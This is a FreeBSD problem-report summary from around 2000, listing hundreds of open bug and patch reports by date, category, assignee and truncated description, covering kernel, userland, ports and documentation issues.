ports/22227 ports boehm-gc don't work correctly in leak det o [2000/10/22] misc/22229 X configuration o [2000/10/23] bin/22238 User PPP "deny_incoming" option does not o [2000/10/23] ports/22239 ports Image-Magic ports make error o [2000/10/23] bin/22256 marcel [RARE] cross-compiled static bins in /usr o [2000/10/23] misc/22266 jasone Possible departure from standards complia o [2000/10/24] ports/22269 ports qmail installation should also modify /et o [2000/10/24] conf/22271 imp /usr/src/UPDATING does not reflect /etc/d o [2000/10/24] misc/22283 when attempting to boot from CDROM to ins o [2000/10/24] misc/22284 Change (SunOS) NIS passwd error o [2000/10/25] bin/22286 siglongjmp does not properly restore the o [2000/10/25] conf/22287 binary upgrade install to 4.1.1 does not o [2000/10/25] bin/22291 getcwd() fails on recently-modified NFS-m o [2000/10/25] ports/22301 ports kdelibs2 fails to build o [2000/10/26] bin/22307 ssh dumps core if fields in password entr o [2000/10/26] ports/22311 ports upgrade of www/cadaver to the latest 1.15 o [2000/10/26] ports/22313 ports print/a2ps-4.13 does not work because of o [2000/10/26] i386/22315 Cannot reboot or power-off the machine o [2000/10/26] bin/22319 Malicious remote user can cause ppp(8) to o [2000/10/26] ports/22323 ports audio/lame can't fetch its source code o [2000/10/26] ports/22328 ports new port -- print/ttf2pt1 o [2000/10/27] bin/22352 Fixit doesn't quite work on serial consol o [2000/10/27] ports/22368 ports new port x11-fonts/koi8u-monaco; new cate o [2000/10/28] kern/22372 |4.1.1-STABLE|[PATCH] resume from suspend o [2000/10/28] ports/22373 ports editors/glimmer build fails (with fix!) o [2000/10/28] ports/22386 ports XFree86-4 -configure crashes with i810 vi o [2000/10/29] kern/22397 ulpt0 usage leads to kernel panic o [2000/10/29] ports/22400 ports klaptopdaemon is useless o [2000/10/29] bin/22401 des pkg_add -r does a segmentation fault o [2000/10/29] ports/22403 ports "make readmes" hangs if category director o [2000/10/29] kern/22405 sheldonh installworld still bombs on perl and othe o [2000/10/30] kern/22411 CD-RW drive works mostly, but can't fixat o [2000/10/30] ports/22416 ports mozilla segfaults on current o [2000/10/30] kern/22417 advansys wide scsi driver does not suppor o [2000/10/30] ports/22420 ports new port graphics/lcms o [2000/10/30] pending/22421gnats-adminNew port: Enhydra 3.1 beta 1 1034 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- a [1995/01/11] i386/105 bde Distributed libm (msun) has non-standard s [1995/05/13] bin/401 Add REMOTE_* variables s [1995/06/15] bin/517 Bad group change with 'install' s [1995/08/07] bin/658 ifconfig alias has to be separately given s [1995/09/26] kern/742 syslog errors accessing Mac hard disks [p o [1995/10/03] kern/765 asmodai umount -f can`t umount a NFS filesystem i s [1995/11/20] kern/831 one minor complaint about the kernel visu a [1995/11/30] bin/854 swapinfo shows incorrect information for a [1996/01/30] bin/981 fenner clnt_broadcast() is not aware of aliases s [1996/03/20] bin/1093 route's diagnostic is weird a [1996/07/07] bin/1375 eivind Extraneous warning from mv(1) [PATCH] s [1996/09/08] bin/1589 msmith [PATCH] ftp fails to flush output o [1996/09/14] gnu/1611 phk groff should use "system-wide" papersize s [1996/10/13] misc/1791 tegge syslimits.h does not allow overriding def o [1996/10/20] bin/1849 obrien gdb sets library breakpoints on the wrong o [1996/10/24] bin/1881 obrien file(1) misidentifies Sun3/m68k executabl s [1996/11/04] gnu/1961 [PATCH] uucp logging files are in /var/sp s [1996/11/22] bin/2090 clients may bind to FreeBSD ypserv refusi s [1996/12/02] bin/2137 vm statistics are bad s [1996/12/14] bin/2216 obrien [PATCH] Ada specs not being compiled into a [1996/12/21] bin/2265 guido su(1) does not call skeyaccess() o [1996/12/24] kern/2273 dufault support for POSIX.4 / POSIX.1a RT-schedul s [1996/12/27] kern/2298 Support for DSR/DCD swapping on serial po a [1996/12/27] misc/2302 brandon new crypt() including SHS and an extendab o [1997/01/10] bin/2442 davidn setusershell()/endusershell() missing o [1997/01/28] bin/2603 dufault Added POSIX.4/POSIX.1b constants in unist o [1997/02/02] gnu/2637 tar dumped core with -g option. a [1997/02/02] bin/2641 wpaul login_access.c doesn't work with NIS by d o [1997/02/15] misc/2745 fenner PR querry web form doesn't sort correctly o [1997/03/03] kern/2865 peter NFS client hangs on umount, ls, df when N o [1997/03/06] bin/2898 fenner arp -a -n buglet o [1997/03/10] bin/2934 cracauer sh(1) has problems with $ENV o [1997/03/10] bin/2938 hoek Add -b, -l, and -f options to du(1) o [1997/03/31] gnu/3157 obrien Patches to gas and gdb to support MMX ext o [1997/04/07] bin/3221 rpc.rusersd : can't communicate with SunO o [1997/04/07] misc/3225 [PATCH] uucpd.c should normalize host nam o [1997/04/08] misc/3237 marcel SCRIPTS addition to bsd.prog.mk o [1997/04/09] bin/3242 incorrect prototype for initgroups o [1997/04/14] bin/3284 [PATCH] symorder(1): -t option doesn´t wo o [1997/04/14] bin/3286 [PATCH] missing error checking in mount_m o [1997/04/17] bin/3314 [PATCH] /etc/daily did not run on April 6 o [1997/04/29] bin/3416 ibcs emulation problems a [1997/05/08] gnu/3552 asmodai the -L option of tar does not work proper o [1997/05/12] kern/3584 luigi cleanup TCP_REASS macro in tcp_input.c o [1997/05/16] bin/3608 Telnet in linemode will break apart long o [1997/06/02] bin/3762 dufault Bogus return values from rtprio(1) f [1997/06/07] bin/3805 single process tftpd o [1997/06/09] bin/3826 KerberosIV sometimes hangs rcp o [1997/06/10] bin/3837 dufault new feature for rtprio o [1997/06/12] kern/3853 luigi netboot/ns8390.c breaks NS datasheet o [1997/06/15] kern/3879 peter Can't export mounted ext2fs via NFS o [1997/06/18] kern/3901 dg Multicast for Intel 10/100 Ethernet Card o [1997/06/19] misc/3912 ctags(1) cannot trace some macro correctl o [1997/06/24] kern/3944 paul if_le doesnt receive ether multicast pack o [1997/06/25] kern/3948 nonworking t/tcp server side o [1997/06/26] i386/3962 sos print disk internal cache size during pro o [1997/06/27] kern/3968 Hardware probes die on Peak SBCs. o [1997/07/07] kern/4051 pppd connect 'chat ...' broken o [1997/07/18] bin/4116 davidn Kerberized login as .root fails to s [1997/07/24] bin/4157 [PATCH] netstat atalk output should print o [1997/07/26] bin/4172 des suggest reconnection option added to fetc s [1997/07/28] kern/4184 [PATCH] minor nits in sys/netatalk s [1997/07/31] bin/4204 [PATCH] ac printed wrong report about tty o [1997/08/07] kern/4243 file locking doesn't work for pipe o [1997/08/08] misc/4249 wpaul ypchsh doesn't care about changing a user o [1997/08/12] misc/4285 SDL RISCom/N2 (ISA) o [1997/08/13] kern/4297 dufault SIGEV_NONE and SIGEV_SIGNAL go in signal. o [1997/08/13] i386/4300 msmith The initial timeout on open("/dev/lpt0".. o [1997/08/14] ports/4304 asami Recommendation re. Ports Collection o [1997/08/29] kern/4413 No way to unmount a floppy that goes bad o [1997/08/29] bin/4419 sheldonh man can display the same man page twice o [1997/08/29] bin/4420 roberto find -exedir doesn't chdir for first entr o [1997/09/03] bin/4459 bde No prototype for moncontrol(3) and monsta o [1997/09/13] kern/4528 processes hang if the mount_portal proces o [1997/09/14] bin/4545 f77 will only call `cc', no com-line opti s [1997/09/15] i386/4547 luigi asc.c and pcaudio.c should use selrecord f [1997/09/16] misc/4556 will make can't build executable from single F o [1997/09/21] kern/4597 Patch to pass NPX status word in signal c f [1997/09/21] kern/4601 Contrib: userconfig patch to edit SCSI co o [1997/09/25] bin/4629 calendar doesn't print all dates sometime o [1997/09/28] misc/4646 Can't fixit with an NFS-mounted CD. o [1997/09/29] conf/4654 Need to do post-ifconfig commands o [1997/10/04] bin/4688 peter sys/utsname.h SYS_NMLN 32 too small o [1997/10/05] bin/4696 ping hangs on certain unresolvable hosts o [1997/10/15] gnu/4771 diff to correct misleading total bytes in o [1997/10/22] bin/4828 ypxfr makes false assumption about RPC ca o [1997/10/24] kern/4845 Boot complains about disk slices in FAT p o [1997/10/24] kern/4847 imp pccard stuff fails after running Win95 wi o [1997/11/01] bin/4915 peter NFS mounts to linux machine can hang syst o [1997/11/08] bin/4975 quotaon while server very busy causes loc o [1997/11/10] kern/4997 DDB_UNATTENDED doesn't always work o [1997/11/11] kern/5009 ibcs2 emulation o [1997/11/13] bin/5031 lpr does not remove original file if -s i o [1997/11/14] kern/5048 dillon Calling shutdown(fd,1) multiple times wil o [1997/11/15] kern/5059 peter mountd, nfsd, etc. fail when lp0 defined o [1997/11/20] kern/5108 dillon pmap_release panics with 'freeing held pa o [1997/11/20] kern/5110 dillon kernel crash & core in pmap_testbit durin o [1997/11/23] bin/5134 cdcontrol will eject a mounted CDROM s [1997/11/28] bin/5173 [PATCH] restore ought to deal with root s s [1997/11/30] i386/5182 bde [PATCH] A patch support high speed serial s [1997/12/11] kern/5275 dillon [PATCH] Added volume (barcode) support to s [1997/12/14] bin/5296 slattach fails creating pidfile with ioct o [1997/12/22] kern/5362 peter mount incorrectly reports / as an NFS exp f [1997/12/30] i386/5398 dillon silo overflows running o [1998/01/02] bin/5410 phantom pkg_info options s [1998/01/03] bin/5419 [PATCH] timed rejects valid networks with f [1998/01/08] kern/5429 Ethernet collision during file transfers s [1998/01/08] bin/5444 [PATCH] ypserv uses wrong dns lookup orde o [1998/01/11] bin/5483 Login(1) clears utmp entry o [1998/01/15] kern/5502 nfsd process usage doesn't get accounted s [1998/01/20] misc/5531 [SUBMISSION] new library function abs2rel s [1998/01/20] kern/5532 [PATCH] Dropped packet counts are inaccur o [1998/01/24] i386/5559 PC-Card joystick ports were not supported o [1998/01/26] kern/5577 bde Unnecessary disk I/O and noatime ffs fixe a [1998/01/28] bin/5591 Trouble with LD_PRELOAD environment varia o [1998/01/31] bin/5609 lpd cannot send long files to HP's JetDir o [1998/02/06] kern/5672 dillon Crash from scsi aborted command 'Overlapp o [1998/02/09] kern/5689 phk sysctl vm.vmmeter - bogus and unsupported o [1998/02/10] bin/5712 /bin/chio code cleaup and option added o [1998/02/14] bin/5745 [PATCH] Add /usr/local/share/mk to defaul o [1998/02/14] bin/5746 bootparamd will not netboot sun 3 compute o [1998/02/14] bin/5747 ld.so error message o [1998/02/17] kern/5768 Shutdown aborts syncing, when sync isn't o [1998/02/18] i386/5784 ibcs2 emulation not handling ioctl(..FION o [1998/02/19] kern/5795 Panic: "bremfree: removing a buffer when o [1998/02/20] misc/5803 "tab" function from "ee" not compatible w s [1998/02/25] misc/5855 /etc/services is out of date with IANA o [1998/02/26] bin/5857 non-functional lpr/lpr o [1998/02/26] kern/5863 Kernel support for sorted SHUTDOWN & SHUT o [1998/03/01] bin/5880 df -t does not support devfs o [1998/03/02] bin/5901 new version of `fmt' o [1998/03/03] bin/5912 kinit exits if no user name specified o [1998/03/06] kern/5931 dma errors in syslog with GUS-max o [1998/03/06] i386/5932 perfmon kernel code should check for non- o [1998/03/11] gnu/5982 no error exit code from tar on child fail o [1998/03/13] bin/6000 kadmin ank uses bad default expiration of o [1998/03/15] bin/6015 indent(1) breaks source with backslash ne o [1998/03/16] kern/6032 poor TCP performance using FDDI over long o [1998/03/22] gnu/6107 obrien gdb should support PRINTF_HAS_LONG_LONG f [1998/03/28] bin/6161 assar 2.2.6 kerberos servers are awfully visibl o [1998/03/31] bin/6183 quota hangups o [1998/03/31] kern/6184 No error if resulting file pos in lseek i o [1998/04/01] bin/6187 peter mounting nfs directories with -b can caus o [1998/04/03] bin/6202 No way to detect removable media. o [1998/04/04] kern/6213 peter NFS-mounted swap (via vnconfig) easily cr o [1998/04/06] bin/6234 ypserv -d is broken o [1998/04/14] kern/6296 IP_HDRINCL sockets force header fields to a [1998/04/14] kern/6299 vmstat -i does not show PnP device interr s [1998/04/15] bin/6314 [PATCH] /usr/sbin/ac modification o [1998/04/16] kern/6318 pppd does not update wtmp on hangup o [1998/04/16] misc/6320 Sometimes nohup isn't good enough. o [1998/04/17] bin/6332 bde /usr/include/time.h doesn't compile with o [1998/04/17] gnu/6338 Gnu tar not working properly with the -G o [1998/04/18] conf/6346 Kernel version strings need to relate to f [1998/04/20] bin/6359 routed does sent router discovry solicita a [1998/04/27] kern/6432 IFF_NOARP does not affect ethernet interf s [1998/05/05] bin/6521 nbm [MAYBE PATCH] "rmdir -p x/y/z/" fails o [1998/05/07] kern/6544 luigi Only get one channel through sound card o [1998/05/11] i386/6595 Old IP address persistent after change o [1998/05/12] misc/6612 hoek bsd.man.mk can't handle man pages with ": o [1998/05/13] kern/6623 non-root user can crash system if disconn o [1998/05/13] conf/6624 davidn One class with nologin=/etc/nologin: reje o [1998/05/15] kern/6651 peter Possible NFS deadlock clue s [1998/05/17] kern/6668 [PATCH] new driver: Virtual Ethernet driv a [1998/05/26] misc/6759 phk buggy code in libdisk.a's disk.c o [1998/05/26] kern/6769 peter panic: nfs rcvunlock s [1998/05/29] kern/6781 [PATCH] exabyte changer doesn't grok LUNs s [1998/05/29] bin/6785 place for all the default dump flags o [1998/06/01] kern/6820 cd9660_mount NULL pointer deref for no CD o [1998/06/06] kern/6874 accounting prevents transition to multi u o [1998/06/13] misc/6936 phk sysinstall: install from MS-DOS MO divece o [1998/06/18] kern/6981 CD unmount w/o CD in drive can cause pani o [1998/06/22] bin/7022 asami changes to bsd.port.mk to accompany PR bi o [1998/06/22] bin/7023 asami bsd.port.(%|subdir.).mk patches for size f [1998/06/23] i386/7031 Our RocketPort port does not support DEVF s [1998/06/24] kern/7044 [PATCH] WaveLAN (2.4G, ISA, full-length b o [1998/06/25] docs/7065 wosch FreeBSD webpages -> applications, port br s [1998/06/28] i386/7100 integrate pcvt configuration into the /et s [1998/07/01] bin/7136 kerberized telnetd doesn't use gettytab % f [1998/07/02] kern/7146 imp The PCCARD doesnt recognize cards in top s [1998/07/08] kern/7210 [PATCH] od(4) bug fixes and enhancements, s [1998/07/10] misc/7232 murray Suggestion for FreeBSD installation dialo o [1998/07/10] kern/7234 yokota keyboard problems during login immediatel o [1998/07/12] bin/7265 A warning flag is added to ln(1). o [1998/07/13] ports/7268 asami MASTER_SITE_OVERRIDE works more better o [1998/07/14] kern/7282 some old and rarely used drivers have app o [1998/07/15] bin/7287 Incorrect domain name for MAP_UPDATE in m o [1998/07/16] bin/7298 Improvements to ln(1). a [1998/07/19] bin/7324 wosch Suggestions for minor modifications to ad f [1998/07/23] kern/7377 we have a new digiboard driver supporting a [1998/07/31] docs/7456 doc dialog(3) man page outdated f [1998/08/12] kern/7589 Tulip Driver parses SROM contents wrong f [1998/08/13] conf/7606 [PATCH] NIS Makefile.dist: NOPUSH replace s [1998/08/18] bin/7669 libalias does not IRC DCC packets under c o [1998/08/19] gnu/7687 description of default baud rate for cu c o [1998/08/20] kern/7693 Misleading warning in cblock_alloc_cblock o [1998/08/22] kern/7722 Changes to acct format o [1998/08/23] bin/7728 ftpd processes hang o [1998/08/27] bin/7753 arp command fails silently on invalid pro o [1998/08/28] misc/7771 Debugging putenv/getenv o [1998/09/02] i386/7816 dfr [Patch] NE2000 PnP card IDs to sys/i386/i o [1998/09/03] bin/7828 Add a command line option to cp to make i o [1998/09/05] kern/7837 patches to add a p_auth extension pointer o [1998/09/08] bin/7860 Extra option to pr(1). s [1998/09/08] bin/7868 [almost patch]Morse Code Fixups o [1998/09/11] bin/7895 multiple identical NFS mounts accepted o [1998/09/16] misc/7946 ccdconfig gives confusing error when give o [1998/09/17] bin/7962 /usr/bin/ee prompts "save changes" when f o [1998/09/18] bin/7973 lpd: Bad control file owner in case of re o [1998/09/19] kern/7990 patch - teach kernel about RB_POWEROFF fl o [1998/09/20] bin/7998 jkh pkg_add seems to have unneeded umask o [1998/09/20] misc/8005 yokota Keyboard freezes going from KDE to text m s [1998/09/21] kern/8015 nbm [patch] Some sysctl descriptions for the o [1998/09/24] ports/8042 torstenb If pidentd dies, you must kill all telnet o [1998/09/26] bin/8060 install ignores the +X mode flag o [1998/09/27] conf/8061 profiling utilities seperate from profili o [1998/09/27] ports/8063 asami [PATCH] Add multiple CDROM support to bsd o [1998/09/29] bin/8084 NIT: non-working code in rshd o [1998/10/03] misc/8133 markm [patch] bug in telnetd (Kerberos IV) o [1998/10/03] misc/8139 [patch] missing /usr/src/share/examples/d f [1998/10/08] bin/8211 Script to search kernel for an address o [1998/10/12] bin/8295 order of options in printcap causes some o [1998/10/13] conf/8303 3.0-981009-BETA can't make swap device on o [1998/10/13] kern/8311 kernel panic on de0 o [1998/10/16] misc/8346 Strftime can't generate ISO-8601 timezone o [1998/10/16] kern/8349 [PATCH] Changer definition for SureStore o [1998/10/19] kern/8376 CLOCK_VIRTUAL not implemented o [1998/10/19] misc/8378 Is termcap not maintained enough ? o [1998/10/22] kern/8420 __getcwd() from an (forcibly) unmounted f o [1998/10/24] misc/8434 boot.flp /bin/init crashes during probe w o [1998/10/24] i386/8436 boot.flp sysinstall crashes when probing o [1998/10/24] bin/8438 ex/vi: Error: tcsetattr: Interrupted syst o [1998/10/27] i386/8474 repquota does not pick up NIS information o [1998/10/28] bin/8479 Final \'s in /etc/exports did not work in o [1998/10/30] kern/8498 Race condition between unp_gc() and accep o [1998/11/03] bin/8553 /usr/libexec/mail.local doesn't handle "> o [1998/11/07] kern/8589 incorrect spelling for "dependency" and " o [1998/11/07] i386/8598 MAKEDEV fails if not run from current dir o [1998/11/08] kern/8604 ps u gets confused about process start ti o [1998/11/09] bin/8631 pci interrupts are shown on EISA only mac o [1998/11/09] kern/8633 TCP packet via SLIP/CSLIP containing this s [1998/11/12] kern/8661 stb sys/netatalk/at_control.c needs to correc o [1998/11/12] bin/8666 X blocks serial port with getty process o o [1998/11/13] gnu/8679 tar man page should be updated o [1998/11/19] misc/8764 pwd_mkdb is slow on many users o [1998/11/19] docs/8765 dwhite some suggested text for describing passwo o [1998/11/27] i386/8867 murray /stand/sysinstall core dumps (signal 11) o [1998/11/30] bin/8913 negative time values for csh 'time' built o [1998/12/01] kern/8925 options kern file needs AWE_DEFAULT_MEM_S o [1998/12/08] bin/9012 route add -host hostIP -interface localIP o [1998/12/15] kern/9092 DELF raid volumes cause panics under CAM f [1998/12/16] i386/9102 Voxware does not provide /dev/mixer for E o [1998/12/16] ports/9107 asami Addition to bsd.port.mk for searching mul o [1998/12/18] bin/9123 pax can't read tar archives that contain o [1998/12/20] kern/9144 luigi acd driver inconsistency (byte order in C o [1998/12/22] bin/9176 dillon placemark to split mount_ufs out of mount o [1998/12/24] bin/9188 telnet gets stuck in ttydrain() f [1998/12/28] misc/9220 nvi: catalog: mistake in Russian error me o [1998/12/29] bin/9233 gmp's mpq_add and mpq_sub are buggy o [1999/01/04] bin/9318 vgrind(1): no JAVA support o [1999/01/04] i386/9319 D-Link DE-528CT poor performance o [1999/01/05] bin/9333 timestamp dump's progress f [1999/01/07] bin/9374 roberto Improved functionality for find(1) o [1999/01/08] conf/9388 obrien magic(5) correction for wordperfect o [1999/01/08] kern/9392 Alternate system clock OR kernel stats cl o [1999/01/13] kern/9474 "comcontrol rescan 0:8:0" hangs, causes o o [1999/01/14] bin/9494 new option to prevent mail from sending m o [1999/01/16] bin/9529 ftp filname completion can't handle space o [1999/01/19] kern/9570 dfr ed(4) irq config enhancement o [1999/01/19] bin/9573 ksrvtgt not working o [1999/01/20] kern/9590 Clean up for -Wall warnings o [1999/01/21] kern/9611 MFS calculates the size incorrectly when o [1999/01/22] kern/9619 Restarting mountd kills existing mounts o [1999/01/25] kern/9679 fix for uninterruptible open in portal fi o [1999/01/25] kern/9689 panic in sbdrop(kern/uipc_socket2.c) o [1999/01/26] bin/9711 Fails: cd /usr/bin; gzip file ; mv file. o [1999/01/27] i386/9721 Patch for FreeBSD netboot (booting via DO o [1999/01/28] kern/9748 error in queue handling of at_shutdown() o [1999/01/28] bin/9770 kris An openpty(3) auxiliary program o [1999/01/29] i386/9777 luigi Generic AD1816 sound suport in Luigi's pc o [1999/01/30] kern/9791 enhancement for netinet/ip_icmp.c to cont o [1999/01/31] ports/9840 asami patch allows ports to fetch their sources o [1999/02/01] bin/9868 Patch to add "date -a" o [1999/02/01] kern/9869 When using macros out of function, they s o [1999/02/01] conf/9874 idle-timeout facilities in /etc/login.con o [1999/02/03] bin/9902 error in german (and some other) locale s o [1999/02/08] bin/9972 groff always built for US (letter) sized o [1999/02/09] i386/9991 new driver for National Instruments GPIB o [1999/02/11] bin/10030 markm Kerberized telnet fails to encrypt when a o [1999/02/16] kern/10116 sos acd driver patch to support PD/CD drive. o [1999/02/19] bin/10158 Reference to ncheck in quot(8) o [1999/02/19] kern/10160 kldload of umap module panics the system o [1999/02/20] kern/10175 Bridging support incomplete for some netc f [1999/02/21] ports/10178 kris USE_SOCKS=YES option broken for security/ a [1999/02/23] misc/10231 inet_addr() doesn't check for illegal val o [1999/02/25] docs/10240 wosch We need a script which check if our web m f [1999/02/26] bin/10274 will make does not understand "lib(obj)" synta o [1999/02/26] bin/10283 Race condition in rc.network o [1999/03/01] docs/10349 phantom For long .Dt fields, rendering is broken- o [1999/03/02] misc/10351 /usr/share/examples/worm is out of date o [1999/03/02] bin/10358 ftp(1) has problems with long pathnames f [1999/03/05] ports/10396 asami SPIN is in the wrong category o [1999/03/06] kern/10440 Discard device does not set ifq_maxlen o [1999/03/06] bin/10444 avoiding lost mail when mail filesystem i o [1999/03/06] ports/10454 obrien Update: emulators/spim a [1999/03/06] kern/10455 pcaudio breakage f [1999/03/07] i386/10465 mdodd Must disable ex0 to install. o [1999/03/12] kern/10563 QIC 40/80 tape drive ft present in versio o [1999/03/13] kern/10574 3.1-stable kernel reports k6 cpu as "\^E" o [1999/03/14] conf/10582 marcel Makefile.upgrade fails with make -j o [1999/03/14] misc/10589 Incorrect assumptions in /etc/security o [1999/03/15] bin/10601 wosch Ownership of symlinks copied by adduser a o [1999/03/15] i386/10608 add Opti Viper-M PCI ID o [1999/03/15] kern/10609 adjtime bug (tv_sec > 2147) and enhanceme o [1999/03/15] bin/10610 New options to date to slowly adjust time o [1999/03/15] bin/10611 timed enhancement o [1999/03/17] kern/10641 Default sync rate in ncr SCSI driver is s o [1999/03/18] kern/10663 hpscan doesn't like 3.1's pt device o [1999/03/18] misc/10667 murray Sysinstall inserts multiple # -- sysinsta o [1999/03/19] gnu/10670 cvs doesn't allow digits in local keyword o [1999/03/19] kern/10673 wpaul Non-ASCII chars on serial console with Re o [1999/03/19] kern/10678 Printing problems using ppc bus o [1999/03/19] ports/10682 asami List mirror sites in MASTER_SITE_BACKUP - o [1999/03/23] kern/10755 de driver says `invalid EESPROM checksum' o [1999/03/25] bin/10793 cvs update modification time check granul o [1999/03/26] misc/10803 joe whois(1) client enchancements a [1999/03/26] misc/10804 joe whois(1) enhancement o [1999/03/27] bin/10825 daily script not executed or executed twi o [1999/03/29] bin/10856 vty's from ttyvc - ttvf (maybe more?) do o [1999/03/30] bin/10868 BUG in /usr/bin/calendar o [1999/03/30] misc/10871 wst0 fails with Sony SuperStation streami o [1999/03/31] kern/10894 wrong error message in svctcp_create() o [1999/04/01] gnu/10910 obrien Integration of Objective C patches into g o [1999/04/02] bin/10924 Extensions to biff(1) o [1999/04/03] bin/10931 biff b o [1999/04/06] bin/10980 With ctags -x no space is left between na o [1999/04/07] docs/10997 doc Problem with query-pr-summary.cgi o [1999/04/08] kern/11020 popen does not honor ISO 9899 syntax o [1999/04/08] bin/11036 markm Perl does not honor -DNOMAN o [1999/04/08] bin/11037 Gencat doesn't properly handle \ddd octal o [1999/04/09] ports/11048 obrien variable not initialized in fwtk-lib lead o [1999/04/09] misc/11052 [PATCH] performance bug fix to fgets() ro o [1999/04/10] conf/11058 Recent change to rc script causes hang on o [1999/04/11] bin/11085 Per-host configuration for syslog.conf o [1999/04/11] bin/11092 readlink(1) from OpenBSD o [1999/04/11] bin/11094 lastlogin.8 from NetBSD o [1999/04/13] misc/11111 Error opening terminal: su o [1999/04/13] bin/11114 will make(1) does not work as documented with o [1999/04/13] misc/11126 vt100 termcap entry appears broken o [1999/04/14] ports/11134 hoek existense of /usr/obj/usr/ports/shells/ba o [1999/04/16] i386/11165 IBCS2 don't work correctly with PID_MAX 9 a [1999/04/16] bin/11168 davidn pw(8) usermod does not recognize -w flag o [1999/04/18] bin/11205 Suggestion: move mt(1) to /bin o [1999/04/20] bin/11236 mountd fails to properly check for kernel o [1999/04/20] conf/11243 mountd startup can lose flags o [1999/04/20] bin/11248 Shuffle o [1999/04/23] kern/11293 brian FreeBSD's PPP implementation of LQM appea o [1999/04/23] bin/11294 direct logging to other hosts (no local s o [1999/04/27] bin/11360 Allow specification of "search" in resolv o [1999/04/28] kern/11365 plip in Linux mode has trouble with some o [1999/04/29] bin/11387 mount_cd9660 doesn't show rockridge filen o [1999/04/29] bin/11399 Calendar doesn't always handle 'last' day o [1999/04/30] kern/11416 code typo in sequencer.c: "if (!processed o [1999/05/02] misc/11448 Better looking VGA font for iso2 o [1999/05/03] misc/11478 assar Non-functional AFS support in KerberosIV o [1999/05/06] misc/11553 /usr/share/misc/latin1 (new file submissi o [1999/05/09] bin/11608 vnconfig not supporting swap-backed vn de o [1999/05/09] bin/11609 vnconfig -v reports page numbers, not byt s [1999/05/09] ports/11611 billf Update port: net/ntop o [1999/05/10] bin/11623 quot uses 32-bit integers for its calcula o [1999/05/12] bin/11669 gcc 2.7.2.1 gets bad magic error linking o [1999/05/12] bin/11671 "vidfont -r" fails, asking for font size o [1999/05/12] kern/11676 PCIless kernel will not compile with ATAP o [1999/05/13] i386/11683 olpt/nlpt name change not in man pages o [1999/05/13] misc/11689 Change "netstat" mode in daily "status-ne o [1999/05/17] bin/11746 Add support for Solaris mailboxes o [1999/05/18] kern/11765 performance bug: network devices fxp & de o [1999/05/18] misc/11767 sppp does not implement VJ compression o [1999/05/19] kern/11789 ELF machine definition missing for ARM o [1999/05/21] bin/11818 Added a feature to ping(8) o [1999/05/21] i386/11829 Boot Failure (Register Dump) with MFSroot o [1999/05/22] misc/11838 xwindows configuration problem o [1999/05/26] bin/11896 cap_mkdb dumps core when non-files passe o [1999/05/26] i386/11898 Connot wirte to floppy on HP OB800CT with o [1999/05/26] bin/11900 Sed(1) fails with MALLOC_OPTIONS set to ' o [1999/05/28] bin/11914 wosch makewhatis during installworld uses /usr/ o [1999/05/29] bin/11929 symorder doesn't work on elf format objec o [1999/05/29] kern/11941 FreeBSD box reboots itself when changing o [1999/05/30] kern/11945 tape problems on -stable, mt bl(ocksize), o [1999/05/31] kern/11968 kldload should call module entry point be o [1999/06/01] i386/11979 Vaio 505DX touchpad not detected as Glide o [1999/06/01] kern/11981 brian access to tunN devices not allowed to non o [1999/06/02] conf/11989 pppd(8) output misplaced o [1999/06/03] kern/12014 Fix SysV Semaphore handling o [1999/06/06] gnu/12046 markm Perl subsystem does not install all tutor a [1999/06/06] bin/12052 sh type builtin appends first path compon o [1999/06/07] kern/12071 [PATCH] large scale IP aliasing o [1999/06/08] i386/12088 Enhancement to ed driver for Linksys 10/1 o [1999/06/09] kern/12095 [PATCH] Buggy ATAPI Zip Drive is not dete o [1999/06/09] bin/12107 Add switch to dump to support multiple du o [1999/06/10] i386/12113 ESS1688 support for VoxWare sound driver o [1999/06/10] bin/12115 pppd reports wrong connected duration wit o [1999/06/16] gnu/12238 bc 1.04 crashes with long formula typed i o [1999/06/16] bin/12244 realpath() fails when there is no permiss o [1999/06/17] bin/12263 hoek "more" problems with long filenames o [1999/06/18] bin/12280 LD_IGNORE_MISSING_OBJECTS not honored for o [1999/06/18] kern/12281 active-filter option in pppd doesn't stop o [1999/06/20] bin/12308 LPD can't be told not to bind to a TCP po o [1999/06/21] conf/12324 jkh Sysinstall's fdisk partition editor is mi o [1999/06/21] ports/12325 asami Adds refetch functionallity to bsd.port.m o [1999/06/21] i386/12326 wdc flag 0x1000 (LBA addressing) prevents o [1999/06/21] kern/12333 ProAudio Spectrum sound card broken model o [1999/06/21] kern/12334 Some ProAudio SPectrum cards do not do DM o [1999/06/21] kern/12335 if_pn.c lacks bridging support; patch enc o [1999/06/22] bin/12357 [PATCH] allow route to create "proxy only s [1999/06/23] bin/12358 ken Patch: "camcontrol help" should go to std o [1999/06/24] i386/12383 make release warns about /dev entries mak o [1999/06/26] bin/12398 fsck in free(): warning: pointer to wrong o [1999/06/27] bin/12421 sysinstall label fails o [1999/06/28] conf/12432 empty amd_flags causes start failure in r o [1999/07/02] docs/12486 mpp listing of (56) utilities in /bin:/sbin:/ o [1999/07/02] bin/12489 /sbin/route exits with 0 on some errors o [1999/07/05] bin/12528 [PATCH] tip's "tipout" child doesn't alwa o [1999/07/06] kern/12543 dg [PATCH] cumulative error counters for fxp o [1999/07/07] bin/12545 kldload(8) should be more sensitive to er o [1999/07/08] ports/12566 billf a guide to pyrotechnics o [1999/07/12] kern/12609 At boottime NFS mounts on a 3.2 client fr f [1999/07/12] misc/12612 ncurses ash shipped with 3.2-R missing sy o [1999/07/13] misc/12633 CMI8330 chip based integrated sound card o [1999/07/15] kern/12655 Kernel config file needs more commenting o [1999/07/16] kern/12668 The kernel clock goes slow with PLIP devi o [1999/07/18] kern/12697 Out of swap handling [PATCH] o [1999/07/20] bin/12712 release/Makefile: mounting /some/dir with o [1999/07/20] kern/12723 imp Unnecessary use of magic numbers in F_[SG o [1999/07/22] kern/12764 luigi Patch for using x11amp with voxware (stol o [1999/07/22] misc/12765 cable problem: link down for de0 NICs. f [1999/07/23] bin/12782 roberto xntpd doesn't handle interface aliases pr o [1999/07/24] bin/12789 Confusing error msg when dumping a filesy s [1999/07/25] bin/12801 sheldonh nvi infinite recursion with options "left o [1999/07/25] bin/12806 `sh -e' doesn't parse multi-command lines o [1999/07/28] kern/12855 panic:softdep_flushfiles:looping, caused o [1999/07/30] misc/12887 Problem with "top" command in SMP o [1999/07/30] misc/12888 strange kernel messages when copying file o [1999/07/31] bin/12898 Added a command-line switch to netstat to o [1999/08/03] bin/12939 add flag to quota to suppress NFS quota c o [1999/08/03] bin/12942 m4: len(`') returns `' o [1999/08/04] ports/12952 asami make 